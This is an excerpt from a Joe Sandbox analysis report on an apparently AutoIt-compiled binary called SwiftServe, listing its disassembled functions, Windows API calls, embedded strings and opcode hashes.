Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: a3eb542e997a253da6961f5920bb2dd2a5b39b0a501eedcf718b999b107a7ee5
Instruction ID: 83ea370082093629309083b9dcf416f2bce61b299a0b99323d1fc2c4a432a8ab
Opcode Fuzzy Hash: a3eb542e997a253da6961f5920bb2dd2a5b39b0a501eedcf718b999b107a7ee5
Instruction Fuzzy Hash: 5DB1EB75A00119AFDB04EFA4CC88DAEBBF9FF48314B149559E909EB251DB30EE45CB50

Function 00E8081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E80896
SetKeyboardState.USER32(?), ref: 00E80901
GetAsyncKeyState.USER32(000000A0), ref: 00E80921
GetKeyState.USER32(000000A0), ref: 00E80938
GetAsyncKeyState.USER32(000000A1), ref: 00E80967
GetKeyState.USER32(000000A1), ref: 00E80978
GetAsyncKeyState.USER32(00000011), ref: 00E809A4
GetKeyState.USER32(00000011), ref: 00E809B2
GetAsyncKeyState.USER32(00000012), ref: 00E809DB
GetKeyState.USER32(00000012), ref: 00E809E9
GetAsyncKeyState.USER32(0000005B), ref: 00E80A12
GetKeyState.USER32(0000005B), ref: 00E80A20

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 911b7b01a865c8dbb5b66efd1d41bd710045cebbc1a40de4441b7fde1036fb86
Instruction ID: 28202b3261ab7e36aba4dfa4f5de5eec3522f90715e5871bb5fe4f1187fef466
Opcode Fuzzy Hash: 911b7b01a865c8dbb5b66efd1d41bd710045cebbc1a40de4441b7fde1036fb86
Instruction Fuzzy Hash: 4951C830A0478829FB79FBA084157AABFF49F41384F0855D9C5CE771C3DA649A8CCBA1

Function 00E7CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00E7CE1C
GetWindowRect.USER32(00000000,?), ref: 00E7CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E7CE8C
GetDlgItem.USER32(?,00000002), ref: 00E7CE97
GetWindowRect.USER32(00000000,?), ref: 00E7CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E7CEFD
GetDlgItem.USER32(?,000003E9), ref: 00E7CF0B
GetWindowRect.USER32(00000000,?), ref: 00E7CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E7CF5F
GetDlgItem.USER32(?,000003EA), ref: 00E7CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E7CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00E7CF97

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 4c4646b4c51db669a47eefd891c9d85860a50bdd144f84d3151881195e7c78f9
Instruction ID: ee11579ff2e5fffcff765c55296e53750dee776b49e275b7803b5672cadec832
Opcode Fuzzy Hash: 4c4646b4c51db669a47eefd891c9d85860a50bdd144f84d3151881195e7c78f9
Instruction Fuzzy Hash: 28513571B00205AFDF18CF69DD95A6EBBBAEB88710F14822DF519E7294D770AD048B50

Function 00E22581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00E229AB: GetWindowLongW.USER32(?,000000EB), ref: 00E229BC

GetSysColor.USER32(0000000F), ref: 00E225AF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c12db35f8112aec9b9f5978b991cdafa30db4e80974fa8f8e3cf93b95ff221ce
Instruction ID: b6dafff84888ff71e5f0aa39a042a467e708622414d4b739dd85feb53db9f6e2
Opcode Fuzzy Hash: c12db35f8112aec9b9f5978b991cdafa30db4e80974fa8f8e3cf93b95ff221ce
Instruction Fuzzy Hash: 74410531001550BFCB245F28AC88BBA3765FB0A335F185369FEA5AE1E1D7709D45DB21

Function 00E329BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00E40B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E32A3E,?,00008000), ref: 00E40BA7

Part of subcall function 00E40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E32A58,?,00008000), ref: 00E402A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E32ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00E32C2C

Part of subcall function 00E33EBE: _wcscpy.LIBCMT ref: 00E33EF6

Part of subcall function 00E4386D: _iswctype.LIBCMT ref: 00E43875

Strings

Bad directive syntax error, xrefs: 00E7008F
EA06, xrefs: 00E6FD48
Error opening the file, xrefs: 00E6FD33, 00E6FDAA
Unterminated string, xrefs: 00E700D6
AU3!, xrefs: 00E32A93
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00E6FD17

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: fe9b9e5a3e78a209e4bdffd66dd1072a500f5f2ee423e21ed1d2f50070e846b2
Instruction ID: 8d18bc1698a4ea512cabe4eba77e83a503b2bc54afcb0318d7d4d0d33d043fbe
Opcode Fuzzy Hash: fe9b9e5a3e78a209e4bdffd66dd1072a500f5f2ee423e21ed1d2f50070e846b2
Instruction Fuzzy Hash: 4402AF701083419FC724EF24D845AAFBBE5EF85354F10692DF5D9A72A2DB30D949CB42

Function 00E24D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00E24D62
__swprintf.LIBCMT ref: 00E24DAC
__i64tow.LIBCMT ref: 00E5DB3B

Strings

True, xrefs: 00E5DAFC
0x%p, xrefs: 00E5DB1D
False, xrefs: 00E5DB03
%.15g, xrefs: 00E24DA6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 19905fb0a3ec57a6c693b5b53ba4094ff77ef49e22bf090127c0a6d9260622ea
Instruction ID: 4468bad94f67d5e7da3b73d08677d31aa11fe9116fe000f09e6cc0f4c8ec1a35
Opcode Fuzzy Hash: 19905fb0a3ec57a6c693b5b53ba4094ff77ef49e22bf090127c0a6d9260622ea
Instruction Fuzzy Hash: FD41B671608209AFDB34DF74EC41EBA73E8EB45304F2068AEE549F7292EA719945CB11

Function 00EA7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA778F
CreateMenu.USER32 ref: 00EA77AA
SetMenu.USER32(?,00000000), ref: 00EA77B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA7846
IsMenu.USER32(?), ref: 00EA785C
CreatePopupMenu.USER32 ref: 00EA7866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EA7893
DrawMenuBar.USER32 ref: 00EA789B

Strings

0, xrefs: 00EA7785
F, xrefs: 00EA7887

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 3b7023dd79e17ce15821cd31fac27cfaa72d750af414e9a6b4ea3685d733b4b2
Instruction ID: cc03fbce7a3d45e5f48f6260073960c72cae45ba394ee8aef7be8dc6f39f2d89
Opcode Fuzzy Hash: 3b7023dd79e17ce15821cd31fac27cfaa72d750af414e9a6b4ea3685d733b4b2
Instruction Fuzzy Hash: D5415574A01219EFDB24DF65D888A9ABBB5FF49300F150129F985BB360D731B914CF60

Function 00EA7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EA7B83
CreateCompatibleDC.GDI32(00000000), ref: 00EA7B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EA7B9D
SelectObject.GDI32(00000000,00000000), ref: 00EA7BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EA7BB0
DeleteDC.GDI32(00000000), ref: 00EA7BB9
GetWindowLongW.USER32(?,000000EC), ref: 00EA7BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EA7BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EA7BE3

Strings

static, xrefs: 00EA7B1B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 854e63f9536a81024ecb4e4863cf041a5feca954e0fd2a440d9793aab261391b
Instruction ID: 8a25ac6634cc8d9da2b528c7578d402f3f9457cdbadf444becc7e91c5113e154
Opcode Fuzzy Hash: 854e63f9536a81024ecb4e4863cf041a5feca954e0fd2a440d9793aab261391b
Instruction Fuzzy Hash: 35317672104219AFDF129F65DC48FDB3B6AEF0E364F101315FA55AA1A0D731A824DBA0

Function 00E834DD Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E8357C

Strings

,z, xrefs: 00E8350F
blank, xrefs: 00E834FE
0z, xrefs: 00E83588, 00E8358B
stop, xrefs: 00E8354D
,z, xrefs: 00E8358D
info, xrefs: 00E8351D
warning, xrefs: 00E83565
question, xrefs: 00E83535

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconLoad
String ID: ,z$,z$0z$blank$info$question$stop$warning
API String ID: 2457776203-2354401043
Opcode ID: 9cb50a4805256acabe6b4bd0b44bfe1fdb9481d78090b1bda71645b5eacc3240
Instruction ID: 93812f5fd7473fd61c8f0ccd1c8b50d1b5192e4e41a313231142a80566966dc0
Opcode Fuzzy Hash: 9cb50a4805256acabe6b4bd0b44bfe1fdb9481d78090b1bda71645b5eacc3240
Instruction Fuzzy Hash: 2011EB7164A356BEA7106B34EC92CAA77DCDF05B64F20201AF51CB62C1E7A56F4147A0

Function 00E47030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E4706B

Part of subcall function 00E48D58: __getptd_noexit.LIBCMT ref: 00E48D58

__gmtime64_s.LIBCMT ref: 00E47104
__gmtime64_s.LIBCMT ref: 00E4713A
__gmtime64_s.LIBCMT ref: 00E47157
__allrem.LIBCMT ref: 00E471AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E471C9
__allrem.LIBCMT ref: 00E471E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E471FE
__allrem.LIBCMT ref: 00E47215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E47233
__invoke_watson.LIBCMT ref: 00E472A4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: a623a1041c41550d04c92b3f0078b7d6ec9c135b625c8b8dc0b4c69c875dec07
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 747127B1A05717ABD7149E78EC41B9AB3E8AF00324F14562AF954F72C1E7B0DD4487D0

Function 00E82CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82CE9
GetMenuItemInfoW.USER32(00EE7890,000000FF,00000000,00000030), ref: 00E82D4A
SetMenuItemInfoW.USER32(00EE7890,00000004,00000000,00000030), ref: 00E82D80
Sleep.KERNEL32(000001F4), ref: 00E82D92
GetMenuItemCount.USER32(?), ref: 00E82DD6
GetMenuItemID.USER32(?,00000000), ref: 00E82DF2
GetMenuItemID.USER32(?,-00000001), ref: 00E82E1C
GetMenuItemID.USER32(?,?), ref: 00E82E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E82EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E82EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E82EDC

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 22a9e54abc7f835518a545d62a6814abe5b7c761771c025db4eb1196aa997f0c
Instruction ID: 262b70bea652d608b2f70b3a8cc8d798a333d7c4fe75682916fc65bdbd0b0862
Opcode Fuzzy Hash: 22a9e54abc7f835518a545d62a6814abe5b7c761771c025db4eb1196aa997f0c
Instruction Fuzzy Hash: B96191B0900249AFDB22EF64DD88ABF7BB8EB44308F14515DFA49B7291D731AD05DB24

Function 00EA7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EA75CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EA75CD
GetWindowLongW.USER32(?,000000F0), ref: 00EA75F1
_memset.LIBCMT ref: 00EA7602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EA7614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EA768C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: ebdf34996098bf6695507e32e28d53803fb77b359673445bca132eb524935834
Instruction ID: 5c9e56a7f2969585714bc9aa874511200cc77e3bc9f94f6eb8a44ed2e776f8c7
Opcode Fuzzy Hash: ebdf34996098bf6695507e32e28d53803fb77b359673445bca132eb524935834
Instruction Fuzzy Hash: 69618975904248AFDB10DFA4CC81EEE77F8AB49704F10119AFA54BB2A1D770BD45DB60

Function 00E777B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E777DD
SafeArrayAllocData.OLEAUT32(?), ref: 00E77836
VariantInit.OLEAUT32(?), ref: 00E77848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E77868
VariantCopy.OLEAUT32(?,?), ref: 00E778BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E778CF
VariantClear.OLEAUT32(?), ref: 00E778E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00E778F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E778FA
VariantClear.OLEAUT32(?), ref: 00E7790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E77917

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9e173fc4df27a8fafcca27797f10955cbabc3aac94d5feca17c04724d7972dcf
Instruction ID: 38b6ff0738b1531be596aa57a608b76c38999e667df623c2528cf13747565aed
Opcode Fuzzy Hash: 9e173fc4df27a8fafcca27797f10955cbabc3aac94d5feca17c04724d7972dcf
Instruction Fuzzy Hash: 03417135A002199FDB04DFA5D8489AEBBB9FF48344F01C169EA55B7261C730A949CF90

Function 00E98AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

CoInitialize.OLE32 ref: 00E98AED
CoUninitialize.OLE32 ref: 00E98AF8
CoCreateInstance.OLE32(?,00000000,00000017,00EB3BBC,?), ref: 00E98B58
IIDFromString.OLE32(?,?), ref: 00E98BCB
VariantInit.OLEAUT32(?), ref: 00E98C65
VariantClear.OLEAUT32(?), ref: 00E98CC6

Strings

Invalid parameter, xrefs: 00E98BE4
Failed to create object, xrefs: 00E98B63, 00E98C19
NULL Pointer assignment, xrefs: 00E98B9D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 162b7768abbcd92f4ee0be8d8a2070660288d6ba34e136e5c5f3a28729bbdf92
Instruction ID: a769003bee499068be8a91b9cc4eeb01db511f8024d78387cc7d3c4008b46819
Opcode Fuzzy Hash: 162b7768abbcd92f4ee0be8d8a2070660288d6ba34e136e5c5f3a28729bbdf92
Instruction Fuzzy Hash: 9B619F70208711AFCB10DF24D949B6BB7E8EF45714F042959F985BB2A1DB70ED48CBA2

Function 00E8BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E8BB89
GetLastError.KERNEL32 ref: 00E8BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00E8BC00

Strings

NOTREADY, xrefs: 00E8BBBF
INVALID, xrefs: 00E8BBD2
UNKNOWN, xrefs: 00E8BBB8
READONLY, xrefs: 00E8BBCB
READY, xrefs: 00E8BBD9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 787dc205527894f029e93b3004e065f9e0d999eacf4ce01c91c4ac2b13fe9b5e
Instruction ID: 8f708b5a937a0e4cb298ed0dbfc933b66d41420f09b68b23e5ca5789bab96faf
Opcode Fuzzy Hash: 787dc205527894f029e93b3004e065f9e0d999eacf4ce01c91c4ac2b13fe9b5e
Instruction Fuzzy Hash: 6D31A335A002099FCB10EF65C859EAEBBB4EF44314F14A15AE80DF72D6EB709905CB50

Function 00E79B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

